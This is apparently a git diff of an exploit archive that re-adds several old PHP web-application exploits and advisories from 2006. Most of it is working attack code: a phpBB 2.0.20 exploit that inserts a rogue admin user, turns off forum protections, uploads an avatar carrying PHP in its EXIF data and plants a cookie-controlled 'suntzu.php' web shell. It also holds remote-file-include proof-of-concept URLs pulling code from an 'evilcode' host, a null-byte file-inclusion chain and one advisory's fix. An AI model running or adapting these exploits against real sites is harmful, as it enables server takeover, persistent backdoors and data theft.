+chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
+chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
+chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
+chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
+chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
+chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
+chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
+chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
+chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
+chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
+chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
+
+/*
+this image has this code inside as EXIF metadata content
+<?php
+$fp=fopen("suntzu.php","w");
+fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
+fclose($fp);
+chmod("suntzu.php",777);
+?>
+*/
+
+$data='-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="action"
+
+edit
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="id"
+
+'.$id.'
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="cat"
+
+postoptions
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="Signature"
+
+
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="avatar"
+
+1
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg"
+Content-Type: image/pjpeg
+
+'.$shell.'
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="avatarurl"
+
+
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg"
+Content-Type: image/pjpeg
+
+'.$shell.'
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="photourl"
+
+
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="photo"
+
+1
+-----------------------------7d614f2d12043e
+Content-Disposition: form-data; name="Save"
+
+Save
+-----------------------------7d614f2d12043e--
+';
+
+$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Keep-Alive\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+echo "step 3 -> try to include avatar or photo...\r\n";
+$xpl=array(
+	   urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)),
+	   urlencode("../../upload/photo_".$id.".jpeg".chr(0x00))
+	  );
+
+for ($i=0; $i<=count($xpl)-1; $i++)
+{
+  $packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies
+  $packet.="Connection: Close\r\n\r\n";
+  $packet.=$data;
+  #debug
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+}
+
+echo "step 4 -> Launch commands...\r\n";
+$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+  echo "Exploit succeeded...";
+  $temp=explode("56789",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-05-11]
diff --git a/platforms/php/webapps/1778.txt b/platforms/php/webapps/1778.txt
index cfa8338c3..564e3ed4f 100755
--- a/platforms/php/webapps/1778.txt
+++ b/platforms/php/webapps/1778.txt
@@ -1,49 +1,49 @@
-# Kurdish Security Advisory
-# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
-# Foing Remote File Include Vulnerability [PHPBB] :}
-# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan
-# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !
-# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org
-# Risk : High
-# Class : Remote
-# Script : Foing
-# Script Website : http://foing.sourceforge.net/
-# Version : Foing 0.7.0
-                 0.6.0
-                 0.5.0
-                 0.4.0
-                 0.3.0
-                 0.2.0
-# w0rkz : "Powered by foing"
-
-# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc..
-
---------------------------------------------------------------------------------
-
-# cmd shell example:
-# cmd shell variable: ($_GET[cmd]);
-
-Vulnerable code :
-
-Get along at directory config.php
-
-did you meet of ..
-
-<?php
-
-define('FOING_INSTALLED', true);
-
-$phpbb_root_path = '../';
-$foing_prefix = $table_prefix;
-
-?>
-
-Proof Of Concept :
-http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
-http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
-http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
-http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
-http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
-http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
-
-# milw0rm.com [2006-05-12]
+# Kurdish Security Advisory
+# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
+# Foing Remote File Include Vulnerability [PHPBB] :}
+# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan
+# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !
+# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org
+# Risk : High
+# Class : Remote
+# Script : Foing
+# Script Website : http://foing.sourceforge.net/
+# Version : Foing 0.7.0
+                 0.6.0
+                 0.5.0
+                 0.4.0
+                 0.3.0
+                 0.2.0
+# w0rkz : "Powered by foing"
+
+# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc..
+
+--------------------------------------------------------------------------------
+
+# cmd shell example:
+# cmd shell variable: ($_GET[cmd]);
+
+Vulnerable code :
+
+Get along at directory config.php
+
+did you meet of ..
+
+<?php
+
+define('FOING_INSTALLED', true);
+
+$phpbb_root_path = '../';
+$foing_prefix = $table_prefix;
+
+?>
+
+Proof Of Concept :
+http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
+http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
+http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
+http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
+http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
+http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
+
+# milw0rm.com [2006-05-12]
diff --git a/platforms/php/webapps/1779.txt b/platforms/php/webapps/1779.txt
index b41f657dd..99819c086 100755
--- a/platforms/php/webapps/1779.txt
+++ b/platforms/php/webapps/1779.txt
@@ -1,24 +1,24 @@
-################DEVIL TEAM THE BEST POLISH TEAM#################
-#Php Blue Dragon Platinum - Remote File Include
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#dork: powered by Php Blue Dragon Platinum
-################################################################
-[code]
-// Szukanie u.ytkownika
-include($vsDragonRootPath."public_includes/pub_language/".$UserSession
--> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
-[/code]
-
-Fix:
-[code]
-// Szukanie u.ytkownika
-$vsDragonRootPath = "./";
-include($vsDragonRootPath."public_includes/pub_language/".$UserSession
--> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
-[/code]
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
-
-# milw0rm.com [2006-05-12]
+################DEVIL TEAM THE BEST POLISH TEAM#################
+#Php Blue Dragon Platinum - Remote File Include
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#dork: powered by Php Blue Dragon Platinum
+################################################################
+[code]
+// Szukanie u.ytkownika
+include($vsDragonRootPath."public_includes/pub_language/".$UserSession
+-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
+[/code]
+
+Fix:
+[code]
+// Szukanie u.ytkownika
+$vsDragonRootPath = "./";
+include($vsDragonRootPath."public_includes/pub_language/".$UserSession
+-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
+[/code]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
+
+# milw0rm.com [2006-05-12]
diff --git a/platforms/php/webapps/1780.php b/platforms/php/webapps/1780.php
index 47ed5dec4..1d382a0fe 100755
--- a/platforms/php/webapps/1780.php
+++ b/platforms/php/webapps/1780.php
@@ -1,916 +1,916 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "PhpBB <= v2.0.20 \"Admin/Restore Database/default_lang remote commands execution\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n";
-echo "-> you need an admin sid, works regardless of magic_quotes_gpc settings\r\n";
-echo "tested and working against a fresh PhpBB installation\r\n\r\n";
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path sid cmd OPTIONS\r\n";
-echo "host:       target server (ip/hostname)\r\n";
-echo "path:       path to PhpBB\r\n";
-echo "sid:        session id\r\n";
-echo "cmd:        a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php\r\n";
-echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80\r\n\r\n";
-die;
-}
-
-/* explaination:
-
-  if you have admin session id, you can enable avatar uploads, if not activated
-  yet and you can store an arbitrary path for "default_lang" inside phpbb_config
-  database table using the "Database Restore" feature. So you can upload a
-  malicious avatar with php code as EXIF metadata content and submit a query like
-  this:
-
-  UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/297984465bc277af10.jpg",CHAR(0)) where config_name="default_lang";
-
-  note: you can see avatar filename in profile page
-
-  in faq.php, like in other files, near line 62, we have:
-
-  ...
-  include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/' . $lang_file . '.' . $phpEx);
-  ...
-
-  $board_config['default_lang'] var is not sanitized before to be used
-  to include files, so you can reach the malicious avatar to execute the code
-  inside of it.
-
-  This tool also creates a "suntzu" user with password "suntzu" and a backdoor
-  called suntzu.php, so you do not need sid after the first run
-								              */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-
-
-echo "step 0 -> check if suntzu.php is already installed...\r\n";
-$packet ="GET ".$p."suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-  echo "Exploit succeeded...\r\n";
-  $temp=explode("56789",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-
-echo "Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...\r\n";
-$data="username=suntzu";
-$data.="&password=suntzu";
-$data.="&redirect=".urlencode("admin/index.php?admin=1");
-$data.="&admin=1";
-$data.="&login=Log+in";
-$packet="POST ".$p."login.php HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."/login.php\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(" ",$temp[3]);
-$cookie=$temp2[0];
-$temp2=explode(" ",$temp[4]);
-$cookie.=" ".$temp2[0];
-$temp=explode("admin=1&sid=",$html);
-$temp2=explode("\n",$temp[1]);
-$session_id=trim($temp2[0]);
-if (($cookie=='') | ($session_id=='')) {
-echo "step 0c -> query database to create a \"suntzu\" user with password \"suntzu\"...\r\n";
-$session_id=trim($argv[3]);
-//usually admin user_id is "2", so you need only session id... however, if you have admin cookie, specify it literally
-$cookie="phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=";
-$cookie.=$session_id.";";
-$sql="
-#
-# let's create a new admin user
-#
-
-INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level,user_email) VALUES ('999999','1','suntzu','d33d57efba4c05808b5d16532f9d1567','1','suntzu\@fakemail.com');
-
-";
-
-$data='-----------------------------7d62702f250530
-Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
-Content-Type: text/plain
-
-'.$sql.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="perform"
-
-restore
------------------------------7d62702f250530
-Content-Disposition: form-data; name="restore_start"
-
-Start Restore
------------------------------7d62702f250530--
-';
-
-$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (eregi("The Database has been successfully restored",$html))
-{
-echo "Done...\r\n";
-}
-else
-{
-die("Unable to modify table... maybe wrong admin sid\r\n");
-}
-}
-else
-{
-echo "Cookie ->".$cookie."\r\n";
-echo "sid ->".urlencode($session_id)."\r\n\r\n";
-}
-
-echo "Step 1 -> Login as suntzu...\r\n";
-$data="username=suntzu";
-$data.="&password=suntzu";
-$data.="&redirect=".urlencode("admin/index.php?admin=1");
-$data.="&admin=1";
-$data.="&login=Log+in";
-$packet="POST ".$p."login.php HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."/login.php\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(" ",$temp[3]);
-$cookie=$temp2[0];
-$temp2=explode(" ",$temp[4]);
-$cookie.=" ".$temp2[0];
-echo "Cookie ->".$cookie."\r\n";
-$temp=explode("admin=1&sid=",$html);
-$temp2=explode("\n",$temp[1]);
-$session_id=trim($temp2[0]);
-echo "sid ->".urlencode($session_id)."\r\n\r\n";
-if (($cookie=='') | ($session_id=='')) {die("Unable to login...");}
-
-echo "step 2 -> enable avatar uploads, if not enabled yet...\r\n";
-$data='-----------------------------7d62702f250530
-Content-Disposition: form-data; name="server_name"
-
-'.$host.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="server_port"
-
-'.$port.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="script_path"
-
-'.$path.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="sitename"
-
-yourdomain.com
------------------------------7d62702f250530
-Content-Disposition: form-data; name="site_desc"
-
-A _little_ text to describe your forum
------------------------------7d62702f250530
-Content-Disposition: form-data; name="board_disable"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="require_activation"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="enable_confirm"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_autologin"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_autologin_time"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="board_email_form"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="flood_interval"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="search_flood_interval"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_login_attempts"
-
-99
------------------------------7d62702f250530
-Content-Disposition: form-data; name="login_reset_time"
-
-30
------------------------------7d62702f250530
-Content-Disposition: form-data; name="topics_per_page"
-
-50
------------------------------7d62702f250530
-Content-Disposition: form-data; name="posts_per_page"
-
-15
------------------------------7d62702f250530
-Content-Disposition: form-data; name="hot_threshold"
-
-25
------------------------------7d62702f250530
-Content-Disposition: form-data; name="default_style"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="override_user_style"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="default_lang"
-
-english
------------------------------7d62702f250530
-Content-Disposition: form-data; name="default_dateformat"
-
-D M d, Y g:i a
------------------------------7d62702f250530
-Content-Disposition: form-data; name="board_timezone"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="gzip_compress"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="prune_enable"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="cookie_domain"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="cookie_name"
-
-phpbb2mysql
------------------------------7d62702f250530
-Content-Disposition: form-data; name="cookie_path"
-
-/
------------------------------7d62702f250530
-Content-Disposition: form-data; name="cookie_secure";
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="session_length"
-
-3600
------------------------------7d62702f250530
-Content-Disposition: form-data; name="privmsg_disable"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_inbox_privmsgs"
-
-50
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_sentbox_privmsgs"
-
-25
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_savebox_privmsgs"
-
-50
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_poll_options"
-
-50
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_html"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_html_tags"
-
-b,i,u,pre
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_bbcode"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_smilies"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="smilies_path"
-
-images/smiles
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_sig"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="max_sig_chars"
-
-255
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_namechange"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_avatar_local"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_avatar_remote"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allow_avatar_upload"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatar_filesize"
-
-6144
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatar_max_height"
-
-100
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatar_max_width"
-
-100
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatar_path"
-
-images/avatars
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatar_gallery_path"
-
-images/avatars/gallery
------------------------------7d62702f250530
-Content-Disposition: form-data; name="coppa_fax"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="coppa_mail"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="board_email"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="board_email_sig"
-
-Thanks, The Suntzu S.p.A.
------------------------------7d62702f250530
-Content-Disposition: form-data; name="smtp_delivery"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="smtp_host"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="smtp_username"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="smtp_password"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="submit"
-
-Submit
-----------------------------7d62702f250530--
-';
-
-$packet="POST ".$p."admin/admin_board.php?sid=".$session_id." HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."admin/admin_board.php?sid=".$session_id."\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (eregi("Forum Configuration Updated Successfully",$html))
-{
-echo "Done...\r\n";
-}
-else
-{echo("Unable to modify configuration...");}
-
-echo "step 3 -> upload an avatar with php code as EXIF metadata content...\r\n";
-$avatar=
